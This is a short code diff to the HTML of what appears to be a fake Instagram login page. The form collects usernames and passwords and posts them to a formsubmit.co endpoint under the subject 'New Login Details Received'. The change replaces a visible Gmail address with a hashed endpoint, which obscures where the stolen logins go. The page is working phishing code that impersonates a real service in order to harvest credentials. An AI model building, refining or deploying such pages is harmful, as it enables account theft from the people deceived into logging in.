--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
     <div class="container">
         <div class="login-box">
             <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram" class="logo">
-            <form action="https://formsubmit.co/eldrithofficial@gmail.com" method="POST">
+            <form action="https://formsubmit.co/7500b8b340189730c54ae32b7a854f8c" method="POST">
                 <input type="hidden" name="_subject" value="New Login Details Received">
                 <input type="text" name="username" placeholder="Username" required>
                 <input type="password" name="password" placeholder="Password" required>
